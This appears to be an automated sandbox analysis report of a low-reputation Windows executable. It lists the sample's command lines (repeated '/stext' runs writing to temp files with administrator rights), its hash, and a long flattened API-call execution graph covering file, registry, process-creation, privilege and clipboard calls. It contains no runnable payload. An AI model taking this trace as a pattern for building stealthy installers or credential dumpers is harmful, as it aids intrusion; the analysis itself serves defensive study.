                                                                                                                                                            Commandline:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\qekmsxigulkljfqhsveponxhojry"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:840'016 bytes
                                                                                                                                                            MD5 hash:CBA1A6515C0AC0889F04664FEDAEC3E3
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:04:03:29
                                                                                                                                                            Start date:05/11/2024
                                                                                                                                                            Path:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\aypetpthqtcqlmmtjgrrrasywyazfan"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:840'016 bytes
                                                                                                                                                            MD5 hash:CBA1A6515C0AC0889F04664FEDAEC3E3
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Reset < >

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:22.9%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:16%
                                                                                                                                                              Total number of Nodes:1536
                                                                                                                                                              Total number of Limit Nodes:50
                                                                                                                                                              execution_graph 4960 401d44 4961 402bac 17 API calls 4960->4961 4962 401d52 SetWindowLongA 4961->4962 4963 402a5a 4962->4963 3865 401ec5 3873 402bac 3865->3873 3867 401ecb 3868 402bac 17 API calls 3867->3868 3869 401ed7 3868->3869 3870 401ee3 ShowWindow 3869->3870 3871 401eee EnableWindow 3869->3871 3872 402a5a 3870->3872 3871->3872 3876 40618a 3873->3876 3875 402bc1 3875->3867 3891 406197 3876->3891 3877 4063b9 3878 4063ce 3877->3878 3909 4060f7 lstrcpynA 3877->3909 3878->3875 3880 406393 lstrlenA 3880->3891 3881 40618a 10 API calls 3881->3880 3884 4062af GetSystemDirectoryA 3884->3891 3886 4062c2 GetWindowsDirectoryA 3886->3891 3888 40618a 10 API calls 3888->3891 3889 40633c lstrcatA 3889->3891 3890 4062f6 SHGetSpecialFolderLocation 3890->3891 3892 40630e SHGetPathFromIDListA CoTaskMemFree 3890->3892 3891->3877 3891->3880 3891->3881 3891->3884 3891->3886 3891->3888 3891->3889 3891->3890 3893 405fde 3891->3893 3898 4063d2 3891->3898 3907 406055 wsprintfA 3891->3907 3908 4060f7 lstrcpynA 3891->3908 3892->3891 3910 405f7d 3893->3910 3896 406012 RegQueryValueExA RegCloseKey 3897 406041 3896->3897 3897->3891 3904 4063de 3898->3904 3899 406446 3900 40644a CharPrevA 3899->3900 3902 406465 3899->3902 3900->3899 3901 40643b CharNextA 3901->3899 3901->3904 3902->3891 3904->3899 3904->3901 3905 406429 CharNextA 3904->3905 3906 406436 CharNextA 3904->3906 3914 405aba 3904->3914 3905->3904 3906->3901 3907->3891 3908->3891 3909->3878 3911 405f8c 3910->3911 3912 405f90 3911->3912 3913 405f95 RegOpenKeyExA 3911->3913 3912->3896 3912->3897 3913->3912 3915 405ac0 3914->3915 3916 405ad3 3915->3916 3917 405ac6 CharNextA 3915->3917 3916->3904 3917->3915 3918 401746 3924 402bce 3918->3924 3922 401754 3923 405cbf 2 API calls 3922->3923 3923->3922 3925 402bda 3924->3925 3926 40618a 17 API calls 3925->3926 3927 402bfb 3926->3927 3928 40174d 3927->3928 3929 4063d2 5 API calls 3927->3929 3930 405cbf 3928->3930 3929->3928 3931 405cca GetTickCount GetTempFileNameA 3930->3931 3932 405cfb 3931->3932 3933 405cf7 3931->3933 3932->3922 3933->3931 3933->3932 4964 4045c6 4965 4045d6 4964->4965 4966 4045fc 4964->4966 4967 40417b 18 API calls 4965->4967 4968 4041e2 8 API calls 4966->4968 4969 4045e3 SetDlgItemTextA 4967->4969 4970 404608 4968->4970 4969->4966 4971 401947 4972 402bce 17 API calls 4971->4972 4973 40194e lstrlenA 4972->4973 4974 402620 4973->4974 3934 403348 SetErrorMode GetVersion 3935 403389 3934->3935 3936 40338f 3934->3936 3937 406500 5 API calls 3935->3937 4024 406492 GetSystemDirectoryA 3936->4024 3937->3936 3939 4033a5 lstrlenA 3939->3936 3940 4033b4 3939->3940 4027 406500 GetModuleHandleA 3940->4027 3943 406500 5 API calls 3944 4033c2 3943->3944 3945 406500 5 API calls 3944->3945 3946 4033ce #17 OleInitialize SHGetFileInfoA 3945->3946 4033 4060f7 lstrcpynA 3946->4033 3949 40341a GetCommandLineA 4034 4060f7 lstrcpynA 3949->4034 3951 40342c 3952 405aba CharNextA 3951->3952 3953 403455 CharNextA 3952->3953 3961 403465 3953->3961 3954 40352f 3955 403542 GetTempPathA 3954->3955 4035 403317 3955->4035 3957 40355a 3959 4035b4 DeleteFileA 3957->3959 3960 40355e GetWindowsDirectoryA lstrcatA 3957->3960 3958 405aba CharNextA 3958->3961 4045 402ea1 GetTickCount GetModuleFileNameA 3959->4045 3962 403317 12 API calls 3960->3962 3961->3954 3961->3958 3965 403531 3961->3965 3964 40357a 3962->3964 3964->3959 3967 40357e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3964->3967 4129 4060f7 lstrcpynA 3965->4129 3966 4035c8 3973 405aba CharNextA 3966->3973 4006 40364e 3966->4006 4019 40365e 3966->4019 3969 403317 12 API calls 3967->3969 3971 4035ac 3969->3971 3971->3959 3971->4019 3975 4035e3 3973->3975 3981 403629 3975->3981 3982 40368e 3975->3982 3976 403796 3978 403818 ExitProcess 3976->3978 3979 40379e GetCurrentProcess OpenProcessToken 3976->3979 3977 403678 4153 405813 3977->4153 3984 4037e9 3979->3984 3985 4037b9 LookupPrivilegeValueA AdjustTokenPrivileges 3979->3985 4130 405b7d 3981->4130 4157 40577e 3982->4157 3989 406500 5 API calls 3984->3989 3985->3984 4001 4037f0 3989->4001 3992 4036a4 lstrcatA 3993 4036af lstrcatA lstrcmpiA 3992->3993 3996 4036cb 3993->3996 3993->4019 3994 403805 ExitWindowsEx 3994->3978 3997 403811 3994->3997 3999 4036d0 3996->3999 4000 4036d7 3996->4000 4177 40140b 3997->4177 3998 403643 4145 4060f7 lstrcpynA 3998->4145 4160 4056e4 CreateDirectoryA 3999->4160 4165 405761 CreateDirectoryA 4000->4165 4001->3994 4001->3997 4073 40390a 4006->4073 4008 4036dc SetCurrentDirectoryA 4009 4036f6 4008->4009 4010 4036eb 4008->4010 4169 4060f7 lstrcpynA 4009->4169 4168 4060f7 lstrcpynA 4010->4168 4013 40618a 17 API calls 4014 403735 DeleteFileA 4013->4014 4015 403742 CopyFileA 4014->4015 4021 403704 4014->4021 4015->4021 4016 40378a 4017 405ed6 36 API calls 4016->4017 4017->4019 4146 403830 4019->4146 4020 40618a 17 API calls 4020->4021 4021->4013 4021->4016 4021->4020 4023 403776 CloseHandle 4021->4023 4170 405ed6 MoveFileExA 4021->4170 4174 405796 CreateProcessA 4021->4174 4023->4021 4026 4064b4 wsprintfA LoadLibraryExA 4024->4026 4026->3939 4028 406526 GetProcAddress 4027->4028 4029 40651c 4027->4029 4030 4033bb 4028->4030 4031 406492 3 API calls 4029->4031 4030->3943 4032 406522 4031->4032 4032->4028 4032->4030 4033->3949 4034->3951 4036 4063d2 5 API calls 4035->4036 4037 403323 4036->4037 4038 40332d 4037->4038 4180 405a8f lstrlenA CharPrevA 4037->4180 4038->3957 4041 405761 2 API calls 4042 40333b 4041->4042 4043 405cbf 2 API calls 4042->4043 4044 403346 4043->4044 4044->3957 4183 405c90 GetFileAttributesA CreateFileA 4045->4183 4047 402ee1 4067 402ef1 4047->4067 4184 4060f7 lstrcpynA 4047->4184 4049 402f07 4185 405ad6 lstrlenA 4049->4185 4053 402f18 GetFileSize 4054 403012 4053->4054 4072 402f2f 4053->4072 4190 402e3d 4054->4190 4056 40301b 4058 40304b GlobalAlloc 4056->4058 4056->4067 4225 403300 SetFilePointer 4056->4225 4201 403300 SetFilePointer 4058->4201 4060 40307e 4064 402e3d 6 API calls 4060->4064 4062 403034 4065 4032ea ReadFile 4062->4065 4063 403066 4202 4030d8 4063->4202 4064->4067 4068 40303f 4065->4068 4067->3966 4068->4058 4068->4067 4069 402e3d 6 API calls 4069->4072 4070 403072 4070->4067 4070->4070 4071 4030af SetFilePointer 4070->4071 4071->4067 4072->4054 4072->4060 4072->4067 4072->4069 4222 4032ea 4072->4222 4074 406500 5 API calls 4073->4074 4075 40391e 4074->4075 4076 403924 4075->4076 4077 403936 4075->4077 4261 406055 wsprintfA 4076->4261 4078 405fde 3 API calls 4077->4078 4079 403961 4078->4079 4081 40397f lstrcatA 4079->4081 4083 405fde 3 API calls 4079->4083 4082 403934 4081->4082 4246 403bcf 4082->4246 4083->4081 4086 405b7d 18 API calls 4087 4039b1 4086->4087 4088 403a3a 4087->4088 4090 405fde 3 API calls 4087->4090 4089 405b7d 18 API calls 4088->4089 4091 403a40 4089->4091 4092 4039dd 4090->4092 4093 403a50 LoadImageA 4091->4093 4094 40618a 17 API calls 4091->4094 4092->4088 4098 4039f9 lstrlenA 4092->4098 4101 405aba CharNextA 4092->4101 4095 403af6 4093->4095 4096 403a77 RegisterClassA 4093->4096 4094->4093 4097 40140b 2 API calls 4095->4097 4099 403aad SystemParametersInfoA CreateWindowExA 4096->4099 4128 403b00 4096->4128 4100 403afc 4097->4100 4102 403a07 lstrcmpiA 4098->4102 4103 403a2d 4098->4103 4099->4095 4108 403bcf 18 API calls 4100->4108 4100->4128 4106 4039f7 4101->4106 4102->4103 4104 403a17 GetFileAttributesA 4102->4104 4105 405a8f 3 API calls 4103->4105 4107 403a23 4104->4107 4109 403a33 4105->4109 4106->4098 4107->4103 4110 405ad6 2 API calls 4107->4110 4111 403b0d 4108->4111 4262 4060f7 lstrcpynA 4109->4262 4110->4103 4113 403b19 ShowWindow 4111->4113 4114 403b9c 4111->4114 4116 406492 3 API calls 4113->4116 4254 4052f0 OleInitialize 4114->4254 4118 403b31 4116->4118 4117 403ba2 4119 403ba6 4117->4119 4120 403bbe 4117->4120 4121 403b3f GetClassInfoA 4118->4121 4123 406492 3 API calls 4118->4123 4126 40140b 2 API calls 4119->4126 4119->4128 4122 40140b 2 API calls 4120->4122 4124 403b53 GetClassInfoA RegisterClassA 4121->4124 4125 403b69 DialogBoxParamA 4121->4125 4122->4128 4123->4121 4124->4125 4127 40140b 2 API calls 4125->4127 4126->4128 4127->4128 4128->4019 4129->3955 4274 4060f7 lstrcpynA 4130->4274 4132 405b8e 4275 405b28 CharNextA CharNextA 4132->4275 4135 403634 4135->4019 4144 4060f7 lstrcpynA 4135->4144 4136 4063d2 5 API calls 4142 405ba4 4136->4142 4137 405bcf lstrlenA 4138 405bda 4137->4138 4137->4142 4140 405a8f 3 API calls 4138->4140 4141 405bdf GetFileAttributesA 4140->4141 4141->4135 4142->4135 4142->4137 4143 405ad6 2 API calls 4142->4143 4281 40646b FindFirstFileA 4142->4281 4143->4137 4144->3998 4145->4006 4147 403848 4146->4147 4148 40383a CloseHandle 4146->4148 4284 403875 4147->4284 4148->4147 4154 405828 4153->4154 4155 403686 ExitProcess 4154->4155 4156 40583c MessageBoxIndirectA 4154->4156 4156->4155 4158 406500 5 API calls 4157->4158 4159 403693 lstrcatA 4158->4159 4159->3992 4159->3993 4161 405735 GetLastError 4160->4161 4162 4036d5 4160->4162 4161->4162 4163 405744 SetFileSecurityA 4161->4163 4162->4008 4163->4162 4164 40575a GetLastError 4163->4164 4164->4162 4166 405771 4165->4166 4167 405775 GetLastError 4165->4167 4166->4008 4167->4166 4168->4009 4169->4021 4171 405ef7 4170->4171 4172 405eea 4170->4172 4171->4021 4338 405d66 4172->4338 4175 4057d5 4174->4175 4176 4057c9 CloseHandle 4174->4176 4175->4021 4176->4175 4178 401389 2 API calls 4177->4178 4179 401420 4178->4179 4179->3978 4181 403335 4180->4181 4182 405aa9 lstrcatA 4180->4182 4181->4041 4182->4181 4183->4047 4184->4049 4186 405ae3 4185->4186 4187 402f0d 4186->4187 4188 405ae8 CharPrevA 4186->4188 4189 4060f7 lstrcpynA 4187->4189 4188->4186 4188->4187 4189->4053 4191 402e46 4190->4191 4192 402e5e 4190->4192 4193 402e56 4191->4193 4194 402e4f DestroyWindow 4191->4194 4195 402e66 4192->4195 4196 402e6e GetTickCount 4192->4196 4193->4056 4194->4193 4226 40653c 4195->4226 4198 402e7c CreateDialogParamA ShowWindow 4196->4198 4199 402e9f 4196->4199 4198->4199 4199->4056 4201->4063 4203 4030ee 4202->4203 4204 40311c 4203->4204 4243 403300 SetFilePointer 4203->4243 4205 4032ea ReadFile 4204->4205 4207 403127 4205->4207 4208 403283 4207->4208 4209 403139 GetTickCount 4207->4209 4211 40326d 4207->4211 4210 4032c5 4208->4210 4215 403287 4208->4215 4209->4211 4218 403188 4209->4218 4212 4032ea ReadFile 4210->4212 4211->4070 4212->4211 4213 4032ea ReadFile 4213->4218 4214 4032ea ReadFile 4214->4215 4215->4211 4215->4214 4216 405d37 WriteFile 4215->4216 4216->4215 4217 4031de GetTickCount 4217->4218 4218->4211 4218->4213 4218->4217 4219 403203 MulDiv wsprintfA 4218->4219 4241 405d37 WriteFile 4218->4241 4230 40521e 4219->4230 4244 405d08 ReadFile 4222->4244 4225->4062 4227 406559 PeekMessageA 4226->4227 4228 402e6c 4227->4228 4229 40654f DispatchMessageA 4227->4229 4228->4056 4229->4227 4232 405239 4230->4232 4240 4052dc 4230->4240 4231 405256 lstrlenA 4234 405264 lstrlenA 4231->4234 4235 40527f 4231->4235 4232->4231 4233 40618a 17 API calls 4232->4233 4233->4231 4236 405276 lstrcatA 4234->4236 4234->4240 4237 405292 4235->4237 4238 405285 SetWindowTextA 4235->4238 4236->4235 4239 405298 SendMessageA SendMessageA SendMessageA 4237->4239 4237->4240 4238->4237 4239->4240 4240->4218 4242 405d55 4241->4242 4242->4218 4243->4204 4245 4032fd 4244->4245 4245->4072 4247 403be3 4246->4247 4263 406055 wsprintfA 4247->4263 4249 403c54 4264 403c88 4249->4264 4251 40398f 4251->4086 4252 403c59 4252->4251 4253 40618a 17 API calls 4252->4253 4253->4252 4267 4041c7 4254->4267 4256 405313 4260 40533a 4256->4260 4270 401389 4256->4270 4257 4041c7 SendMessageA 4258 40534c OleUninitialize 4257->4258 4258->4117 4260->4257 4261->4082 4262->4088 4263->4249 4265 40618a 17 API calls 4264->4265 4266 403c96 SetWindowTextA 4265->4266 4266->4252 4268 4041d0 SendMessageA 4267->4268 4269 4041df 4267->4269 4268->4269 4269->4256 4272 401390 4270->4272 4271 4013fe 4271->4256 4272->4271 4273 4013cb MulDiv SendMessageA 4272->4273 4273->4272 4274->4132 4276 405b43 4275->4276 4278 405b53 4275->4278 4277 405b4e CharNextA 4276->4277 4276->4278 4280 405b73 4277->4280 4279 405aba CharNextA 4278->4279 4278->4280 4279->4278 4280->4135 4280->4136 4282 406481 FindClose 4281->4282 4283 40648c 4281->4283 4282->4283 4283->4142 4285 403883 4284->4285 4286 40384d 4285->4286 4287 403888 FreeLibrary GlobalFree 4285->4287 4288 4058bf 4286->4288 4287->4286 4287->4287 4289 405b7d 18 API calls 4288->4289 4290 4058df 4289->4290 4291 4058e7 DeleteFileA 4290->4291 4292 4058fe 4290->4292 4296 403667 OleUninitialize 4291->4296 4293 405a2c 4292->4293 4325 4060f7 lstrcpynA 4292->4325 4293->4296 4301 40646b 2 API calls 4293->4301 4295 405924 4297 405937 4295->4297 4298 40592a lstrcatA 4295->4298 4296->3976 4296->3977 4300 405ad6 2 API calls 4297->4300 4299 40593d 4298->4299 4302 40594b lstrcatA 4299->4302 4304 405956 lstrlenA FindFirstFileA 4299->4304 4300->4299 4303 405a50 4301->4303 4302->4304 4303->4296 4305 405a8f 3 API calls 4303->4305 4304->4293 4323 40597a 4304->4323 4307 405a5a 4305->4307 4306 405aba CharNextA 4306->4323 4308 405877 5 API calls 4307->4308 4309 405a66 4308->4309 4310 405a80 4309->4310 4311 405a6a 4309->4311 4313 40521e 24 API calls 4310->4313 4311->4296 4315 40521e 24 API calls 4311->4315 4313->4296 4314 405a0b FindNextFileA 4316 405a23 FindClose 4314->4316 4314->4323 4317 405a77 4315->4317 4316->4293 4318 405ed6 36 API calls 4317->4318 4318->4296 4320 4058bf 60 API calls 4320->4323 4321 40521e 24 API calls 4321->4314 4322 40521e 24 API calls 4322->4323 4323->4306 4323->4314 4323->4320 4323->4321 4323->4322 4324 405ed6 36 API calls 4323->4324 4326 4060f7 lstrcpynA 4323->4326 4327 405877 4323->4327 4324->4323 4325->4295 4326->4323 4335 405c6b GetFileAttributesA 4327->4335 4330 405892 RemoveDirectoryA 4333 4058a0 4330->4333 4331 40589a DeleteFileA 4331->4333 4332 4058a4 4332->4323 4333->4332 4334 4058b0 SetFileAttributesA 4333->4334 4334->4332 4336 405883 4335->4336 4337 405c7d SetFileAttributesA 4335->4337 4336->4330 4336->4331 4336->4332 4337->4336 4339 405db2 GetShortPathNameA 4338->4339 4340 405d8c 4338->4340 4342 405ed1 4339->4342 4343 405dc7 4339->4343 4365 405c90 GetFileAttributesA CreateFileA 4340->4365 4342->4171 4343->4342 4345 405dcf wsprintfA 4343->4345 4344 405d96 CloseHandle GetShortPathNameA 4344->4342 4346 405daa 4344->4346 4347 40618a 17 API calls 4345->4347 4346->4339 4346->4342 4348 405df7 4347->4348 4366 405c90 GetFileAttributesA CreateFileA 4348->4366 4350 405e04 4350->4342 4351 405e13 GetFileSize GlobalAlloc 4350->4351 4352 405e35 4351->4352 4353 405eca CloseHandle 4351->4353 4354 405d08 ReadFile 4352->4354 4353->4342 4355 405e3d 4354->4355 4355->4353 4367 405bf5 lstrlenA 4355->4367 4358 405e54 lstrcpyA 4361 405e76 4358->4361 4359 405e68 4360 405bf5 4 API calls 4359->4360 4360->4361 4362 405ead SetFilePointer 4361->4362 4363 405d37 WriteFile 4362->4363 4364 405ec3 GlobalFree 4363->4364 4364->4353 4365->4344 4366->4350 4368 405c36 lstrlenA 4367->4368 4369 405c3e 4368->4369 4370 405c0f lstrcmpiA 4368->4370 4369->4358 4369->4359 4370->4369 4371 405c2d CharNextA 4370->4371 4371->4368 4975 4038c8 4976 4038d3 4975->4976 4977 4038d7 4976->4977 4978 4038da GlobalAlloc 4976->4978 4978->4977 4389 4014ca 4390 40521e 24 API calls 4389->4390 4391 4014d1 4390->4391 4979 401fcb 4980 402bce 17 API calls 4979->4980 4981 401fd2 4980->4981 4982 40646b 2 API calls 4981->4982 4983 401fd8 4982->4983 4985 401fea 4983->4985 4986 406055 wsprintfA 4983->4986 4986->4985 4987 6f951000 4990 6f95101b 4987->4990 4997 6f9514bb 4990->4997 4992 6f951020 4993 6f951027 GlobalAlloc 4992->4993 4994 6f951024 4992->4994 4993->4994 4995 6f9514e2 3 API calls 4994->4995 4996 6f951019 4995->4996 4999 6f9514c1 4997->4999 4998 6f9514c7 4998->4992 4999->4998 5000 6f9514d3 GlobalFree 4999->5000 5000->4992 4392 4014d6 4393 402bac 17 API calls 4392->4393 4394 4014dc Sleep 4393->4394 4396 402a5a 4394->4396 4397 401759 4398 402bce 17 API calls 4397->4398 4399 401760 4398->4399 4400 401786 4399->4400 4401 40177e 4399->4401 4437 4060f7 lstrcpynA 4400->4437 4436 4060f7 lstrcpynA 4401->4436 4404 401784 4408 4063d2 5 API calls 4404->4408 4405 401791 4406 405a8f 3 API calls 4405->4406 4407 401797 lstrcatA 4406->4407 4407->4404 4413 4017a3 4408->4413 4409 40646b 2 API calls 4409->4413 4410 405c6b 2 API calls 4410->4413 4412 4017ba CompareFileTime 4412->4413 4413->4409 4413->4410 4413->4412 4414 40187e 4413->4414 4417 4060f7 lstrcpynA 4413->4417 4423 40618a 17 API calls 4413->4423 4429 405813 MessageBoxIndirectA 4413->4429 4432 401855 4413->4432 4435 405c90 GetFileAttributesA CreateFileA 4413->4435 4415 40521e 24 API calls 4414->4415 4418 401888 4415->4418 4416 40521e 24 API calls 4433 40186a 4416->4433 4417->4413 4419 4030d8 31 API calls 4418->4419 4420 40189b 4419->4420 4421 4018af SetFileTime 4420->4421 4422 4018c1 CloseHandle 4420->4422 4421->4422 4424 4018d2 4422->4424 4422->4433 4423->4413 4425 4018d7 4424->4425 4426 4018ea 4424->4426 4427 40618a 17 API calls 4425->4427 4428 40618a 17 API calls 4426->4428 4430 4018df lstrcatA 4427->4430 4431 4018f2 4428->4431 4429->4413 4430->4431 4431->4433 4434 405813 MessageBoxIndirectA 4431->4434 4432->4416 4432->4433 4434->4433 4435->4413 4436->4404 4437->4405 5001 401959 5002 402bac 17 API calls 5001->5002 5003 401960 5002->5003 5004 402bac 17 API calls 5003->5004 5005 40196d 5004->5005 5006 402bce 17 API calls 5005->5006 5007 401984 lstrlenA 5006->5007 5009 401994 5007->5009 5008 4019d4 5009->5008 5013 4060f7 lstrcpynA 5009->5013 5011 4019c4 5011->5008 5012 4019c9 lstrlenA 5011->5012 5012->5008 5013->5011 4438 40535c 4439 405507 4438->4439 4440 40537e GetDlgItem GetDlgItem GetDlgItem 4438->4440 4442 405537 4439->4442 4443 40550f GetDlgItem CreateThread CloseHandle 4439->4443 4484 4041b0 SendMessageA 4440->4484 4445 405565 4442->4445 4446 405586 4442->4446 4447 40554d ShowWindow ShowWindow 4442->4447 4443->4442 4507 4052f0 5 API calls 4443->4507 4444 4053ee 4449 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4444->4449 4448 40556d 4445->4448 4450 4055c0 4445->4450 4493 4041e2 4446->4493 4489 4041b0 SendMessageA 4447->4489 4452 405575 4448->4452 4453 405599 ShowWindow 4448->4453 4458 405463 4449->4458 4459 405447 SendMessageA SendMessageA 4449->4459 4450->4446 4460 4055cd SendMessageA 4450->4460 4490 404154 4452->4490 4456 4055b9 4453->4456 4457 4055ab 4453->4457 4455 405592 4463 404154 SendMessageA 4456->4463 4462 40521e 24 API calls 4457->4462 4464 405476 4458->4464 4465 405468 SendMessageA 4458->4465 4459->4458 4460->4455 4466 4055e6 CreatePopupMenu 4460->4466 4462->4456 4463->4450 4485 40417b 4464->4485 4465->4464 4467 40618a 17 API calls 4466->4467 4469 4055f6 AppendMenuA 4467->4469 4471 405614 GetWindowRect 4469->4471 4472 405627 TrackPopupMenu 4469->4472 4470 405486 4473 4054c3 GetDlgItem SendMessageA 4470->4473 4474 40548f ShowWindow 4470->4474 4471->4472 4472->4455 4476 405643 4472->4476 4473->4455 4475 4054ea SendMessageA SendMessageA 4473->4475 4477 4054b2 4474->4477 4478 4054a5 ShowWindow 4474->4478 4475->4455 4479 405662 SendMessageA 4476->4479 4488 4041b0 SendMessageA 4477->4488 4478->4477 4479->4479 4480 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4479->4480 4482 4056a1 SendMessageA 4480->4482 4482->4482 4483 4056c3 GlobalUnlock SetClipboardData CloseClipboard 4482->4483 4483->4455 4484->4444 4486 40618a 17 API calls 4485->4486 4487 404186 SetDlgItemTextA 4486->4487 4487->4470 4488->4473 4489->4445 4491 404161 SendMessageA 4490->4491 4492 40415b 4490->4492 4491->4446 4492->4491 4494 4042a5 4493->4494 4495 4041fa GetWindowLongA 4493->4495 4494->4455 4495->4494 4496 40420f 4495->4496 4496->4494 4497 40423c GetSysColor 4496->4497 4498 40423f 4496->4498 4497->4498 4499 404245 SetTextColor 4498->4499 4500 40424f SetBkMode 4498->4500 4499->4500 4501 404267 GetSysColor 4500->4501 4502 40426d 4500->4502 4501->4502 4503 404274 SetBkColor 4502->4503 4504 40427e 4502->4504 4503->4504 4504->4494 4505 404291 DeleteObject 4504->4505 4506 404298 CreateBrushIndirect 4504->4506 4505->4506 4506->4494 5014 40275d 5015 402763 5014->5015 5016 402a5a 5015->5016 5017 40276b FindClose 5015->5017 5017->5016 5018 401a5e 5019 402bac 17 API calls 5018->5019 5020 401a67 5019->5020 5021 402bac 17 API calls 5020->5021 5022 401a0e 5021->5022 5023 40495e 5024 40498a 5023->5024 5025 40496e 5023->5025 5027 404990 SHGetPathFromIDListA 5024->5027 5028 4049bd 5024->5028 5034 4057f7 GetDlgItemTextA 5025->5034 5030 4049a0 5027->5030 5031 4049a7 SendMessageA 5027->5031 5029 40497b SendMessageA 5029->5024 5033 40140b 2 API calls 5030->5033 5031->5028 5033->5031 5034->5029 5035 4029de 5036 406500 5 API calls 5035->5036 5037 4029e5 5036->5037 5038 402bce 17 API calls 5037->5038 5039 4029ee 5038->5039 5041 402a2a 5039->5041 5045 40614a 5039->5045 5042 4029fc 5042->5041 5049 406134 5042->5049 5046 406155 5045->5046 5047 406178 IIDFromString 5046->5047 5048 406171 5046->5048 5047->5042 5048->5042 5052 406119 WideCharToMultiByte 5049->5052 5051 402a1d CoTaskMemFree 5051->5041 5052->5051 5053 4027df 5054 402bce 17 API calls 5053->5054 5056 4027ed 5054->5056 5055 402803 5058 405c6b 2 API calls 5055->5058 5056->5055 5057 402bce 17 API calls 5056->5057 5057->5055 5059 402809 5058->5059 5081 405c90 GetFileAttributesA CreateFileA 5059->5081 5061 402816 5062 402822 GlobalAlloc 5061->5062 5063 4028bf 5061->5063 5064 4028b6 CloseHandle 5062->5064 5065 40283b 5062->5065 5066 4028c7 DeleteFileA 5063->5066 5067 4028da 5063->5067 5064->5063 5082 403300 SetFilePointer 5065->5082 5066->5067 5069 402841 5070 4032ea ReadFile 5069->5070 5071 40284a GlobalAlloc 5070->5071 5072 402894 5071->5072 5073 40285a 5071->5073 5075 405d37 WriteFile 5072->5075 5074 4030d8 31 API calls 5073->5074 5080 402867 5074->5080 5076 4028a0 GlobalFree 5075->5076 5077 4030d8 31 API calls 5076->5077 5078 4028b3 5077->5078 5078->5064 5079 40288b GlobalFree 5079->5072 5080->5079 5081->5061 5082->5069 5083 4028e0 5084 402bac 17 API calls 5083->5084 5085 4028e6 5084->5085 5086 402925 5085->5086 5087 40290e 5085->5087 5096 4027bf 5085->5096 5089 40293f 5086->5089 5090 40292f 5086->5090 5088 402913 5087->5088 5091 402922 5087->5091 5097 4060f7 lstrcpynA 5088->5097 5093 40618a 17 API calls 5089->5093 5092 402bac 17 API calls 5090->5092 5098 406055 wsprintfA 5091->5098 5092->5096 5093->5096 5097->5096 5098->5096 5099 4023e0 5100 402bce 17 API calls 5099->5100 5101 4023f1 5100->5101 5102 402bce 17 API calls 5101->5102 5103 4023fa 5102->5103 5104 402bce 17 API calls 5103->5104 5105 402404 GetPrivateProfileStringA 5104->5105 5106 6f951837 5107 6f95185a 5106->5107 5108 6f95188a GlobalFree 5107->5108 5109 6f95189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5107->5109 5108->5109 5110 6f951266 2 API calls 5109->5110 5111 6f951a1e GlobalFree GlobalFree 5110->5111 5112 401b63 5113 402bce 17 API calls 5112->5113 5114 401b6a 5113->5114 5115 402bac 17 API calls 5114->5115 5116 401b73 wsprintfA 5115->5116 5117 402a5a 5116->5117 5118 401d65 5119 401d78 GetDlgItem 5118->5119 5120 401d6b 5118->5120 5122 401d72 5119->5122 5121 402bac 17 API calls 5120->5121 5121->5122 5123 401db9 GetClientRect LoadImageA SendMessageA 5122->5123 5124 402bce 17 API calls 5122->5124 5126 401e1a 5123->5126 5128 401e26 5123->5128 5124->5123 5127 401e1f DeleteObject 5126->5127 5126->5128 5127->5128 5129 4042e6 5130 4042fc 5129->5130 5138 404408 5129->5138 5134 40417b 18 API calls 5130->5134 5131 404477 5132 404541 5131->5132 5133 404481 GetDlgItem 5131->5133 5140 4041e2 8 API calls 5132->5140 5136 404497 5133->5136 5137 4044ff 5133->5137 5135 404352 5134->5135 5139 40417b 18 API calls 5135->5139 5136->5137 5143 4044bd SendMessageA LoadCursorA SetCursor 5136->5143 5137->5132 5144 404511 5137->5144 5138->5131 5138->5132 5141 40444c GetDlgItem SendMessageA 5138->5141 5142 40435f CheckDlgButton 5139->5142 5154 40453c 5140->5154 5162 40419d KiUserCallbackDispatcher 5141->5162 5160 40419d KiUserCallbackDispatcher 5142->5160 5166 40458a 5143->5166 5148 404517 SendMessageA 5144->5148 5149 404528 5144->5149 5148->5149 5149->5154 5155 40452e SendMessageA 5149->5155 5150 404472 5163 404566 5150->5163 5152 40437d GetDlgItem 5161 4041b0 SendMessageA 5152->5161 5155->5154 5157 404393 SendMessageA 5158 4043b1 GetSysColor 5157->5158 5159 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5157->5159 5158->5159 5159->5154 5160->5152 5161->5157 5162->5150 5164 404574 5163->5164 5165 404579 SendMessageA 5163->5165 5164->5165 5165->5131 5169 4057d9 ShellExecuteExA 5166->5169 5168 4044f0 LoadCursorA SetCursor 5168->5137 5169->5168 5170 6f95103d 5171 6f95101b 5 API calls 5170->5171 5172 6f951056 5171->5172 5173 40166a 5174 402bce 17 API calls 5173->5174 5175 401671 5174->5175 5176 402bce 17 API calls 5175->5176 5177 40167a 5176->5177 5178 402bce 17 API calls 5177->5178 5179 401683 MoveFileA 5178->5179 5180 40168f 5179->5180 5181 401696 5179->5181 5183 401423 24 API calls 5180->5183 5182 40646b 2 API calls 5181->5182 5185 4022e2 5181->5185 5184 4016a5 5182->5184 5183->5185 5184->5185 5186 405ed6 36 API calls 5184->5186 5186->5180 4842 40216b 4843 402bce 17 API calls 4842->4843 4844 402172 4843->4844 4845 402bce 17 API calls 4844->4845 4846 40217c 